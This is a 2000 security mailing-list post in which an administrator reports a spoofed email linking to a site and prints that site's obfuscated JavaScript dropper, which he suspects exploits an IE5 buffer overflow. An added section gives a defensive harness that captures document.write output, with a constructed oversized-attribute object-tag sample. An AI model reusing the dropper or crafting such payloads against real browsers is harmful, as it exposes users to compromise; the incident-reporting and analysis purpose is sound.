Security Incidents mailing list archives
Hostile email
From: mmurray () TAOS COM (mmurray () TAOS COM)
Date: Wed, 12 Jul 2000 08:38:48 -0400
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey all...

Got an email containing this, this morning [Note: those were HTML tags; I removed the tags around them, so that it's benign]:

a href="http://209.235.47.178/index.html"/a
a href="http://209.235.47.178/index.html"owwww! my ass!/a
___

Just so that everybody knows, the subject line of the email is "Is this Jim?", and it was BCC'd to me. Sender was a yahoo.com email address with a reply-to that was at aol.com. I'm guessing that both were spoofed (although I haven't bounced yet on either). Never had a spoofed one with a reply-to; seems kinda strange.

Went to the site, and it's a blank site except for a piece of JavaScript (source follows, tags removed):

html
script src="_" /script
script language="Javascript"
!--
function rm(){var rmt="%%%%%%%%%NNNNN[[[[[NNNa%%%%%%%%%NNNN>[[[[[NNN^%%%%%%%%%NNNNC[[[[[NNNL%%%%%% %%%NNNN][[[[[NNNW%%%%%%%%%NNNNr[[[[[NNNL%%%%%%%%%NNNNN[[[[[NNNI%%%%%%%%%NNNN#[[[ [[NNN^%%%%%%%%%NNNN9[[[[[NNNB%%%%%%%%%NNNN1[[[[[NNN/%%%%%%%%%NNNN~[[[[[NNN/%%%%% %%%%NNNNr[[[[[NNNx%%%%%%%%%NNNNN[[[[[NNNN%%%%%%%%%NNNN][[[[[NNNU%%%%%%%%%NNNNP[[ [[[NNNh%%%%%%%%%NNNNr[[[[[NNNe%%%%%%%%%NNNNC[[[[[NNNU%%%%%%%%%NNNNN[[[[[NNNI%%%% %%%%%NNNNP[[[[[NNN^%%%%%%%%%NNNN,[[[[[NNN\t%%%%%%%%%NNNNN[[[[[NNNU%%%%%%%%%NNNNr [[[[[NNNT%%%%%%%%%NNNNf[[[[[NNN\t%%%%%%%%%NNNNC[[[[[NNNu%%%%%%%%%NNNNN[[[[[NNNB% %%%%%%%%NNNNv[[[[[NNNx%%%%%%%%%NNNN7[[[[[NNN|%%%%%%%%%NNNNs[[[[[NNNt%%%%%%%%%NNN N~[[[[[NNNh%%%%%%%%%NNNN9[[[[[NNNn%%%%%%%%%NNNN<[[{[[NNNU%%%%%%%%%NNNNN[[z[[NNN| %%%%%%%%%NNNNc[[U[[NNNa%%%%%%%%%NNNN7[[n[[NNN^%%%%%%%%%NNNNP[[d[[NNNL%%%%%%%%%NN NN,[[N[[NNNW%%%%%%%%%NNNNN[{z[[NNNL%%%%%%%%%NNNN+[+j[[NNNI%%%%%%%%%NNNN7[s&[[NNN ^%%%%%%%%%NNNNs[#U[[NNNB%%%%%%%%%NNNNN[X4[[NNN/%%%%%%%%%NNNN7[CU[[NNNP%%%%%%%%%N NNN,[Nu[[NNNh%%%%%%%%%NNNN~[]B[[NNNL%%%%%%%%%NNNN`[sx[[NNN\t%%%%%%%%%NNNNN[)\n[[ NNNu%%%%%%%%%NNNNH[BS[[NNN&%%%%%%%%%NNNN;[xS[[NNNu%%%%%%%%%NNNNa[=F[[NNNd%%%%%%% 
%[NNNNV[a([[NNNo%%%%%%%%[NNNN@[}+[[NNNL%%%%%%%%[NNNNN[L+[[NNNU%%%%%%%%[NNNNr[ex[ [NNNu%%%%%%%%[NN%N7[4?[[NNN/%%%%%%%%[NN{N9[x%[[NNN.%%%%%%%%[NN}N#[N{[[NNNu%%%%%% %%[NN\tN`[^$[[NNN\t%%%%%%%%[NNWN<[&z[[NNNL%%%%%%%%[NNnN{[uU[[NNNI%%%%%%%%[NN?N$[ Un[[NNNu%%%%%%%%[NN%Nr[4d[[NNNh%%%%%%%%[NN[NP[4?[[NNNN%%%%%%%%[NN[Nr[t%[[NNNL%%% %%%%%[NN[N~[h{[[NNNu%%%%%%%%[NN[NC[j$[[NNNI%%%%%%%%[NN[N?[B}[[NNN\t%%%%%%%%[NN[N %[xL[[NNN.%%%%%%%%[NN[N{[de[[NNNx%%%%%%%%[NN[N$[\t4[[NNN?%%%%%%%%[NN[N}[^?[[NNN{ %%%%%%%%[NN[N\t[x[[[NNNt%%%%%%%%[NN[NW[N[[[NNNe%%%%%%%%[NN[Nn[h[[[NNNj%%%%%%%%[N N[N?[U[[[NNNN%%%%%%%%[NN[N[{u[[[NNN^%%%%%%%%[NN[NN+\t[[[NNNu%%%%%%%%[NN[NNs^[[[N NN&%%%%%%%%[NN[NN#t[[[NNNB%%%%%%%%[NN[NNX![[[NNNx%%%%%%%%[NN[NNC\t[[NNNN}%%%%%%% %[NN[NN]?[[NNNNL%%%%%%%%[NN[NNCN[[NNNNL%%%%%%%%[NN[NNr%[[NNNNo%%%%%%%%[NN[NNN[[[ NNNNY%%%%%%%%[NN[NNs[[[NNNN$%%%%%%%%[NN[NN7[[[NNNN$%%%%%%%%[NN[NNv[[[NNNN|%%%%%% %%[NN[NN][[[NNNN|%%%%%%%%[NN[NNB[[[NNNN|%%%%%%%%[NN[NNx[[[NNN%a%%%%%%%%[NN[NN;[[ [NNN{u%%%%%%%%[NN[NNS[[[NNNo\t%%%%%%%%[NN[NNS[[[NNN?!%%%%%%%%[NN[NN [[[NNN-^%%%%%%%%[NN[NNx[[[NNNhU%%%%%%%%[NN[NNN[[[NNNz\\%%%%%%%%[NN[NNz[[[NNN^L%% %%%%%%[NN[NNU[[[NNNoa%%%%%%%%[NN[NNu[[[NNN.&%%%%%%%%[NN[NNn[[[NNN{U%%%%%%%%[NN[[ N\t[[[NNN$e%%%%%%%%[NN[[Nu[[[NNNo$%%%%%%%%[NN[[NB[[[NNN?t%%%%%%%%[NN[[Nx[[[NNN{e %%%%%%%%[NN[[NS[[[NNNzW%%%%%%%%[NN[[Nx[[[NNNuj%%%%%%%%[NN[[NN[[[NNN?\t%%%%%%%%[N N[[Ne[[[NNN{^%%%%%%%%[NN[[NW[[[NNNo$%%%%%%%%[NN[[Nu[[[NNNN\t%%%%%%%%[NN[[Nj[[[NN NWh%%%%%%%%[NN[[Nt[[[NNN4&%%%%%%%%[NN[[Nh[[[NNNtj%%%%%%%%[NN[[N}[[[NNNjI%%%%%%%% [NN[[N\t[[[NNNhd%%%%%%%%[NN[[Nt[[[NNNBa%%%%%%%%[NN[[Nj[[[NNNxj%%%%%%%%[NN[[N}[[[ NNN&t%%%%%%%%[NN[[NL[[[NNN\t\\%%%%%%%%[NN[[NB[[[NNNhx%%%%%%%%[NN[[Nx[[[NNNLN%%%% %%%%[NN[[NS[[[NNN\tW%%%%%%%%[NN[[Nx[[[NNNu4%%%%%%%%[NN[[NN[[[NNNxL%%%%%%%%[NN[[N e[[[NNN?B%%%%%%%%[NN[[NW[[[NNN{x%%%%%%%%[NN[[Nu[[[NNNW|%%%%%%%%[NN[[[j[[[NNNN|%% %%%%%%[NN[[[t[[[NNN}|%%%%%%%%[NN[[[h[[[NNNua%%%%%%%%[NN[[[|[[[NNN\ts%%%%%%%%[NN[ 
[[t[[[NNN\\\t%%%%%%%%[NN[[[n[[[NNNB!%%%%%%%%[NN[[[L[[[NNNx]%%%%%%%%[NN[[[}[[[NNN }U%%%%%%%%[NN[[[B[[[NNNL\\%%%%%%%%[NN[[[x[[[NNNLL%%%%%%%%[NN[[[S[[[NNNoa%%%%%%%% [NN[[[x[[[NNNY&%%%%%%%%[NN[[[?[[[NNN$U%%%%%%%%[NN[[[N[[[NNN$e%%%%%%%%[NNN[[[[[[N NN|x%%%%%%%%[NNN[[[[[[NNN|N%%%%%%%%%NNN[[[[[[NNN|z%%%%%%%%{NNN[[[[[[NNNaU%%%%%%% %}NNN[[[[[[NNNuu%%%%%%%%LNNN[[[[[[NNN\tn%%%%%%%%eNNN[[[[[[NNN!\t%%%%%%%%4NNN[[[[ [[NNN^u%%%%%%%%?NNN[[[[[[NNNUB%%%%%%%%NNNN[[[[[[NNN\\x%%%%%%%%NNNN[[[[[[NNNLS%%% %%%%%NNNN[[[[[[NNNax%%%%%%%%NNNN[[[[[[NNN&N%%%%%%%%NNNN[[[[[[NNNU|%%%%%%%%NNNN[[ [[[[NNNet%%%%%%%%NNNN[[[[[[NNN$n%%%%%%%%NNNN[[[[[[NNN\tL%%%%%%%%NNNN[[[[[[NNNh}% %%%%%%%NNNN[[[[[[NNNLB%%%%%%%%NNNN[[[[[[NNN\tx%%%%%%%%NNNN[[[[[[NNNu\"%%%%%%%%NN NN[[[[[[NNNa\"%%%%%%%%NNNN[[[[[[NNN}x%%%%%%%%NNNN[[[[[[NNNLN%%%%%%%%NNNN[[[[[[NN Ne}%%%%%%%%NNNN[[[[[[NNN4\t%%%%%%%%NNNN[[[[[[NNNxt%%%%%%%%NNNN[[[[[[NNNNj%%%%%%% %NNNN[[[[[[NNNU}%%%%%%%%NNNN{[[[[[NNNhL%%%%%%%%NNNNr[[[[[NNNeB%%%%%%%%NNNNP[[[[[ NNNUx%%%%%%%%NNNNr[[[[[NNNI\"%%%%%%%%NNNN~[[[[[NNN^@%%%%%%%%NNNNC[[[[[NNN\tx%%%% %%%%NNNN?[[[[[NNNU?%%%%%%%%NNNN,[[[[[NNNI{%%%%%%%%NNNN#[[[[[NNNL$%%%%%%%%NNNNX[[ [[[NNNBW%%%%%%%%NNNNC[[[[[NNNx?%%%%%%%%NNNN9[[[[[NNN^{%%%%%%%%NNNNN[[[[[NNN\t$%% %%%%%%NNNNr[[[[[NNN4o%%%%%%%%NNNNf[[[[[NNN\\?%%%%%%%%NNNNC[[[[[",rmv=1,rms=966,rmr=46;document.write((rmo)((rmt),(rms),(rmr),(rmv)));}(rm());
//--
/script
/html

As I read this, it looks like it's designed to overflow a buffer in the browser. Best guess is that it exploits a vulnerability in IE 5, but I haven't proved that yet (I'm currently on a Linux box that was NOT vulnerable). Anybody back me up on the theory? Anybody else seen this?

Just thought I'd put out a heads-up...
Mike
___________________________________________________________
Mike Murray                              mmurray () taos com
System and Network Administrator
Taos -- The Sys Admin Company
San Francisco, CA
pager: 415-253-2786
___________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.2

iQA/AwUBOWxm1R93UCkjW5r0EQJmLACg6HRpX6ftJNwSB69hhz4Ibm3/F3gAnRT5
NvjPz3NNZxupcNqcGMukm5P2
=Axih
-----END PGP SIGNATURE-----
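The script in the post above builds a long string, hands it to a decoder rmo() that is pulled in from a second script (the script src="_" line) and is not reproduced on this page, and passes the result to document.write(). Without that decoder nobody can replay the real payload here, but the way an analyst normally settles the "is it an overflow?" question for this kind of dropper is to run it with document.write replaced by a capture sink and then inspect what was actually emitted: total length, longest attribute value, whether it drops object/embed/iframe/script tags, and which URLs it references. The following is an added example of that harness, not the poster's code and not the site's script. The decoder, the payload and the host example.invalid in it are constructed stand-ins so the harness has something to run against offline.

```javascript
'use strict';
// Added example: capture-sink harness for analysing document.write() droppers
// offline under Node (node capture_sink.js). Nothing below is the site's
// decoder or payload; those are constructed stand-ins for demonstration.

// Run `dropper` against a fake `document` whose write()/writeln() record the
// output instead of rendering it, then return the markup plus triage indicators.
function captureDocumentWrite(dropper) {
  const chunks = [];
  const fakeDocument = {
    write: (s) => { chunks.push(String(s)); },
    writeln: (s) => { chunks.push(String(s) + '\n'); },
  };
  dropper(fakeDocument);
  const html = chunks.join('');
  return { html, indicators: triage(html) };
}

// Indicators worth checking before guessing at the exploit class: size of the
// emitted markup, longest quoted attribute value (a common overflow vector),
// active-content tags, and any further URLs the markup would make the browser fetch.
function triage(html) {
  const attrValues = [...html.matchAll(/=\s*"([^"]*)"/g)].map((m) => m[1]);
  const tagNames = [...html.matchAll(/<\s*([a-zA-Z][\w-]*)/g)].map((m) => m[1].toLowerCase());
  const urls = [...html.matchAll(/\b(?:src|href|codebase)\s*=\s*"([^"]*)"/gi)].map((m) => m[1]);
  const active = new Set(['script', 'object', 'embed', 'applet', 'iframe']);
  return {
    totalLength: html.length,
    longestAttributeValue: attrValues.reduce((n, v) => Math.max(n, v.length), 0),
    oversizedAttributes: attrValues.filter((v) => v.length > 256).length,
    activeContentTags: tagNames.filter((t) => active.has(t)),
    referencedUrls: urls,
  };
}

// CONSTRUCTED decoder standing in for the site's rmo(): a reversible shift
// over printable ASCII. It is not the real decoder and makes no claim about it.
function sampleDecode(text, shift) {
  let out = '';
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    out += (c >= 32 && c <= 126) ? String.fromCharCode(((c - 32 - shift + 95) % 95) + 32) : ch;
  }
  return out;
}
function sampleEncode(text, shift) {
  let out = '';
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    out += (c >= 32 && c <= 126) ? String.fromCharCode(((c - 32 + shift) % 95) + 32) : ch;
  }
  return out;
}

// CONSTRUCTED sample: an <object> tag with an oversized classid attribute and a
// placeholder codebase host, encoded with the stand-in so the harness round-trips.
const SHIFT = 7;
const samplePlain = '<object classid="clsid:' + 'A'.repeat(300) +
  '" codebase="http://example.invalid/x.cab"></object>';
const samplePayload = sampleEncode(samplePlain, SHIFT);

// Shape of a dropper as seen in the wild: decode, then write into the document.
function sampleDropper(document) {
  document.write(sampleDecode(samplePayload, SHIFT));
}

function analyseSample() {
  return captureDocumentWrite(sampleDropper);
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  const result = analyseSample();
  console.log(JSON.stringify(result.indicators, null, 2));
}
```

To use it against a real sample, save the page's script and the fetched decoder to disk, wrap them so that `document` resolves to the fake object passed into the dropper, and read the indicators instead of letting a browser render the output. A very long single attribute value or an object/embed pointing at a further download is what the triage is designed to surface.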